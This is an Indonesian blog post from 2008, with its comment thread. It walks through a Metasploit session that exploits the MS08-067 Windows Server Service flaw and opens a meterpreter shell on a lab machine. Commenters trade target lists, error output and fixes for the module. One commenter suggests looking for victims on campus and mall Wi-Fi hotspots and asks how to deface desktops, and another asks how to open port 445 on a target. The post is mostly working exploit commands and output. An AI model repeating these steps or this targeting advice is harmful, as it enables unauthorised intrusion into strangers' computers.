MS08-067

msf > version
Framework: 3.2-testing.5773
Console  : 3.2-testing.5773

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options

Module options:

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST                     yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

msf exploit(ms08_067_netapi) > info windows/smb/ms08_067_netapi

Name: Microsoft Server Service Relative Path Stack Corruption
Version: 5803
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)

Provided by:
hdm 

Available targets:
Id  Name
--  ----
0   Windows XP SP2 English (DEP)
1   Windows XP SP3 English (DEP)
2   Windows 2003 SP0 English (NO DEP)
3   Windows 2003 SP2 English (NO DEP)

Basic options:
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST                     yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload information:
Space: 400
Avoid: 7 characters

Description:
This module exploits a parsing flaw in the path canonicalization
code of NetAPI32.dll through the Server Service. This module is
capable of bypassing DEP on some operating systems and service
packs. The correct target must be used to prevent the Server Service
(along with a dozen others in the same process) from crashing.
Windows XP targets seem to handle multiple successful exploitation
events, but 2003 targets will often crash or hang on subsequent
attempts. This is just the first version of this module, full
support for DEP bypass on 2003, along with other platforms, is still
in development.

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-4250
http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx

msf exploit(ms08_067_netapi) > set RHOST 192.168.132.130
RHOST => 192.168.132.130

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp

msf exploit(ms08_067_netapi) > set TARGET 0
TARGET => 0
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Connecting to the target...
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:[email protected]_np:192.168.132.130[BROWSER] ...
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:[email protected]_np:192.168.132.130[BROWSER] ...
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73227 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.132.1:51707 -> 192.168.132.130:4444)

meterpreter > sysinfo
Computer: Research-1
OS      : Windows XP (Build 2600, Service Pack 2).

Lagi-lagi netbios menjadi pintu masuk Microsoft Windows. Mungkin sudah saatnya pemberi tutorial melupakan RPC DCOM holes untuk contoh menembus Microsoft Windows via Metasploit.

I think everyone love 2008…

40 Responses to “MS08-067”

1. poniman_coy says:

   October 31, 2008 at 12:43 pm

   wah thanks nih omz, btw kok yg versi framework 3.2 yg buat win blm keluar ya

   Reply
2. staff says:

   November 1, 2008 at 6:54 am

   Metasploit 3.2 kan msh testing, utk mendapatkan versi itu bisa dengan cara update lngsng dari trunk nya via svn

   Reply
3. gentoo says:

   November 3, 2008 at 1:42 pm

   AFAIK, target 0 bukankah option windows 2000 ?, jika benar berarti kemungkinan ret addr-nya sama kah,(and kayaknya enggak deh) so wierd 🙂 , btw bisa exploit buatan EMM. anyway sepertinya development MSF makin tersendat neh :).. hehe

   Reply
4. staff says:

   November 3, 2008 at 3:53 pm

   #3 tergantung versi nya, klo update svn terbaru udah lbh banyak lagi data target nya dari berbagai locale hasil sumbangan komunitas MSF worldwide. Tulisan diatas menggunakan release yg awal2. RET ADDR ya beda lah. Hihi, iya ya sjk spoonm sama skape gak jd core developer kyknya bakal terjadi perubahan nih 🙂

   msf > version
   Framework: 3.2-testing.5773
   Console : 3.2-testing.5773
   msf exploit(ms08_067_netapi) > show targets

   Exploit targets:

   Id Name
   — —-
   0 Windows 2000 English
   1 Windows XP SP0 English (NO NX)
   2 Windows XP SP1 English (NO NX)
   3 Windows XP SP2 English (NX)
   4 Windows XP SP2 French (NX)
   5 Windows XP SP2 Italian (NX)
   6 Windows XP SP2 Portuguese (Brazil) (NX)
   7 Windows XP SP2 German (NX)
   8 Windows XP SP2 Chinese (NX)
   9 Windows XP SP3 French (NX)
   10 Windows XP SP3 English (NX)
   11 Windows XP SP3 Spanish (NX)
   12 Windows XP SP3 German (NX)
   13 Windows XP SP3 Portuguese (Brazil) (NX)
   14 Windows 2003 SP0 English (NO NX)
   15 Windows 2003 SP1 English (NO NX)
   16 Windows 2003 SP2 English (NO NX)
   17 Windows 2003 SP1 English (NX)
   18 Windows 2003 SP2 English (NX)

   Reply
5. gentoo says:

   November 5, 2008 at 10:02 am

   hahaha, iya, sori gak liat kalo dah lo list di artikel (hmm, kurang jeli aje), gw lama ga pake MSF, masih konvensional terpaku di single exploit (rilisnya lebih cepat, apalagi kalo dari irc :lol:)

   iya, ditambah lagi isu perubahan lisensi, lagian keknya emang ada isu politis soal di tunda-tundanya rilis exploit ini. Mikocok ketakutan sepertinya

   Reply
6. franky says:

   November 6, 2008 at 4:19 pm

   mas, sy sdh mengupdate metasploit hari kamis, 6 Nov 2008 (command = “svn update”), tapi kok g jalan ya…
   errornya seperti ini
   msf exploit(ms08_067_netapi) > exploit
   [*] Started bind handler
   [*] Automatically detecting the target…
   [*] Fingerprint: Windows XP Service Pack 2 – lang:English
   [*] Selected Target: Windows XP SP2 English (NX)
   [-] Exploit failed: can’t convert nil into Integer
   [*] Exploit completed, but no session was created.
   msf exploit(ms08_067_netapi) >
   padahal ketika saya update hari rabu, 5 nov 2008 exploit berjalan,,padahal dengan komputer yg sama (LAN sediri, kok).tu kenapa, ya mas?
   ato saya bisa minta file “ms08_067_netapi.rb” punya mas itu?tolong kirimkan ke e-mail sy ya, mas…
   terima kasih…

   Reply
7. CorbinZ says:

   November 6, 2008 at 10:16 pm

   @poniman_coy
   kalo mao pake versi yang 3.2-testing di WINDOWS harus update melalui svn update. Caranya “svn co http://metasploit.com/svn/framework3/trunk”

   @franky
   “Exploit failed: can’t convert nil into Integer”. Kata ownernya HD-Moore pas saya contact, dia bilang emang untuk SP tertentu terjadi seperti itu..but, hold on..coba deh liat scriptnya pake notepad.
   find word: “Sratch” replace ke “Scratch”.itu untuk patch revisi 5846 gagal menurut ku. coba nantikan aja patch selanjutnya mungkin typonya sudah dibenarkan.

   TO all: i new here, need learn much from you all. esspesially making exploit code.

   Thank’s

   -Corbinz-

   Reply
8. staff says:

   November 7, 2008 at 12:56 pm

   # 6, seperti yang dikatakan oleh CorbinZ, terdapat typo atau salah tulis untuk setiap target dibagian Scratch address nya. Pada update tsb tertulis Sratch bukan Scratch, saya sudah coba update dengan trunk yang sama dengan kamu dan mendapatkan error yg sama, cukup ganti Sratch dengan Scratch.

   $ sed s/Sratch/Scratch/g ms08_067_netapi.rb

   # 7, Welcome… =)

   Reply
9. Ph03n1X says:

   November 7, 2008 at 1:09 pm

   Woh makin keren saja., anak-anak muda jaman sekarang..
   **pakek metasploit aja ga pernah dan ga bisa 🙁

   Reply
10. scut says:

    November 8, 2008 at 10:20 am

    ** Duh, gak pernah bisa pakek Metasploit… Nasib deh **

    Reply
11. franky says:

    November 8, 2008 at 2:41 pm

    @corbinZ and @staff
    exploitnya sdh berjalan kembali, thanks bgt mas….
    @ph03n1x and @scut
    dicoba aja terus, jgn menyerah n klo da error kan bisa di diskusikan disini….

    Reply
12. Ph03n1X says:

    November 9, 2008 at 3:15 am

    #10
    makane mbut, tidak nunggu kiriman! Cari sendiri =))
    #11
    Siaaapppppppppppp juragan 🙂

    Reply
13. QU1NT1N says:

    November 10, 2008 at 4:15 am

    saya dah install BT3F, trus dah update msf3 nya. kira2 proses lanjutan yg pake “PAYLOAD windows/meterpreter/bind_tcp” gimana ya? maaf pengen tau aj. gak ada lahan buat uji coba. terima kasih yg dah mau jawab.

    Reply
14. franky says:

    November 10, 2008 at 7:48 am

    @QU1NT1N
    ketik ja “help”, ntar da pilihan fitur2 pa ja yg da pada meterpreter….
    Selamat mencoba..

    Reply
15. poniman_coy says:

    November 10, 2008 at 1:38 pm

    @CorbinZ thanks broo berjalan dianya,

    Reply
16. QU1NT1N says:

    November 10, 2008 at 5:30 pm

    gitu ya mas franky? ya udah, tak pinjem cd bajakan dulu…

    Reply
17. poniman_coy says:

    November 10, 2008 at 6:45 pm

    wah kenapa ya mas, pas saya jalankan svn co http://metasploit.com/svn/framework3/trunk ya dia jalan, trus udh selesai ada tulisan cek revision 5846, nah kan sarannya mas diatas buat replace kata Sratch dengan Scratch. pas aku cek kata sratch udah gk ada lg yang ada Scratch, jadi kan udah bener, nah jadi pas saya use windows/smb/ms08_067_netapi kok failed apa masih ada yang salah ya ? apa karena saya pake metas yg 3.0 apa mesti pake yang 3.1 ?

    Reply
18. dsh3ll.d says:

    November 11, 2008 at 11:58 am

    http://www.kecoak-elektronik.net/log/2008/10/31/ms08-067/

    check this out…

    Reply
19. dsh3ll.d says:

    November 11, 2008 at 12:00 pm

    http://video.google.com/videoplay?docid=-5555664098592837592

    😉

    Reply
20. scut says:

    November 11, 2008 at 1:12 pm

    #12 Aku tanggal 15 November ke Bandung, kalau kau mau ikut coba confirmasi ke Opik.

    Reply
21. CorbinZ says:

    November 11, 2008 at 10:53 pm

    @poniman_coy
    YUP…pake yang 3.1 aja kan lebih up to date…

    Reply
22. staff says:

    November 11, 2008 at 11:22 pm

    #20, titip liat awewe-awewe di bandung nyak, dah lama gak jenguk =))

    Reply
23. poniman_coy says:

    November 12, 2008 at 1:00 am

    @CorbinZ saya coba omz…

    @http://video.google.com/videoplay?docid=-5555664098592837592 , bisa buta liat tu video…pecah gambarnya..

    Reply
24. QU1NT1N says:

    November 12, 2008 at 4:54 am

    minta ijin download videonya.

    Reply
25. asmssl says:

    November 17, 2008 at 4:53 am

    Saya menggunakan Metasploit versi 3.1 untuk Windows. Sudah diupdate menggunakan file Online Update, tapi belum ad juga tuh exploit untuk MS08-067… saya sudah punya ms08_067_netapi.rb , lalu bagaimana untuk mengintegrasikanny ke dalam Framework Metasploitnya???

    Trim’s

    Reply
26. zodiac says:

    November 18, 2008 at 2:47 pm

    Mas, gimana setting di svn kalo pake http proxy, aku coba kok gagal melulu

    Reply
27. f4r1z says:

    November 19, 2008 at 9:08 am

    ko udah a “svn co http://metasploit.com/svn/framework3/trunk” masih
    msf > version
    Framework: 3.1-release.5366
    Console : 3.1-release.5404
    udah aku “svn update” keluarnya
    Skipped ‘.’
    mohon solusinya dong

    Reply
28. b4tn3t says:

    December 1, 2008 at 10:33 am

    wah masih bingung hehehehe.. bener” ngga ada tempat buat explorasinya sih..

    Reply
29. franky says:

    December 5, 2008 at 8:26 am

    @f4riz
    km download aja yg versi 3.2, kan sudah release…
    @b4tn3t
    soal target, kan bisa cari di kampus2 n mall2 yg nyediakan hotspot…

    ada yg tau atau punya video untuk deface tampilan desktop nya??
    thanks semua…

    Reply
30. f4r1z says:

    December 10, 2008 at 10:37 pm

    @franky
    iy ni, udah download ko and sudah berhasil, terima kasih semua buat anak2 kecoak, nambah ilmu ni

    Reply
31. iroel says:

    December 20, 2008 at 10:56 pm

    Keren tuh, tinggal bagaimana cara mempertahankannya. Ada yang tahu? Jangan sampe habis menyerang, kita malah diserang kalah total :))

    Btw, ada yang tahu cara install modul/exploit tambahan di metasploit nggak ?

    Reply
32. asik2 says:

    December 30, 2008 at 8:51 pm

    ^– di jalanin aja Start -> Programs -> Metasploit 3 -> Online Update,,
    nanti dia download sendiri koq ^_^

    Wah,, mantab2, bisa lho dipake ke XP SP2,

    btw, gimana caranya supaya kita bisa ngebuka port 445 di komp target supaya bisa masukin exploit ini?ada yang tahu?plz . . .

    Reply
33. CyberTank says:

    January 8, 2009 at 6:03 pm

    #31
    Mempertahankan? update aja windoznya :p

    #32
    Ngebuka port? uninstall updatenya :p

    Reply
34. youthanesia says:

    February 1, 2009 at 12:42 am

    cara puka port mah susah kali ya, mendingan scan port 445. Tp yo suwi yooo…

    Reply
35. az says:

    May 15, 2009 at 10:23 pm

    msf exploit(ms08_067_netapi) > exploit

    [*] Started bind handler
    [*] Automatically detecting the target…
    [*] Fingerprint: Windows XP Service Pack 2 – lang:English
    [*] Selected Target: Windows XP SP2 English (NX)
    [*] Triggering the vulnerability…
    [*] Exploit completed, but no session was created.

    # koq ga bisa yahhhh ?? ada ide temn2 ?

    Reply
36. grind says:

    June 11, 2009 at 6:31 am

    iya nih problem sama kaya #35

    …..
    [*] Triggering the vulnerability…
    [*] Exploit completed, but no session was created.

    knapa tuh om?

    Reply
37. NewBie says:

    July 18, 2009 at 9:05 am

    Sama tuh … ga pernah berhasil.
    Slalu GAGAL truz…fyuuuuhhhh

    Reply
38. cemens says:

    July 30, 2009 at 12:21 pm

    siang yang panas :

    sa coba ngikut ini tapi ko selalu muncul :

    >> exploit
    [*] Started bind handler
    [*] Automatically detecting the target…
    [*] Fingerprint: Windows XP Service Pack 2 – lang:English [*] Selected Target: Windows XP SP2 English (NX) [*] Triggering the vulnerability…
    [*] Exploit completed, but no session was created.

    tq : infonya

    Reply
39. iroel says:

    October 6, 2009 at 4:40 pm

    Metasploit 3.2 yg versi portable bisa didownload di http://www.indowebster.com/Metasploit_Framework_32_Portable.html Silakan gunakan dengan bijak.

    Aq nyoba sama seperti tutorial. Session DOS promptnya tidak muncul. Klo pake payload windows/shell_bind_tcp, sessionnya langsung close klo pengen buka DOS promptnya target. Ada yg tau penyebabnya? Ini outputnya:
    [*] Started bind handler
    [*] Automatically detecting the target…
    [*] Fingerprint: Windows XP Service Pack 3 – lang:English [*] Selected Target: Windows XP SP3 English (NX) [*] Triggering the vulnerability…
    [*] Command shell session 2 opened (192.168.0.6:1661 -> 192.168.0.1:4545) [*] Command shell session 2 closed.

    Reply
40. rooted.slash says:

    October 24, 2009 at 12:28 am

    lol
    happy playing 🙂
    playing for happy
    wtf 😛

    Reply